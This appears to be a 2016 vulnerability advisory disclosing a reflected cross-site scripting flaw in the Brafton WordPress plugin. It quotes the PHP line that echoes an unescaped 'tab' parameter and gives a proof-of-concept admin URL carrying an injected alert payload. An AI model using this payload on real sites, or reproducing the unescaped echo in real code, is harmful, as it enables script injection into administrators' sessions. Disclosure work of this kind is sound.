# Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin # Date: Fri May 20 2016 # Reported Date : Fri May 20 2016 # Vendor Homepage: http://www.brafton.com/support/wordpress/ # Version: v3.3.10 ? January2016 # Software Link: https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip # Exploit Author :MehrdadLinux # Tested On : Linux Platforms. # Fix/Patching : Update To # Facebook : https://facebook.com/MehrdadLinux # Twitter : http://twitter.com/MehrdadLinux # Detailed Vul: http://blog.opsnit.com =========================================================================================== 1. VULNERABILITY ------------------------- brafton WordPress Plugin v3.3.10 ? January2016 2. BACKGROUND ------------------------- this is WordPress Plugin for Brafton Brafton is a content marketing agency. Our in-house teams develop and execute SEO-optimized content strategies, from news to infographics 3. DESCRIPTION ------------------------- XSS in BraftonAdminPage.php in line 11 : tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo 0;}?>; wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) 4. discovered by : ------------------------- The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and Hossein Masoudi (cs.masoudi) email : MehrdadLinux (at) gmail (dot) com http://opsnit.com 5 .LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.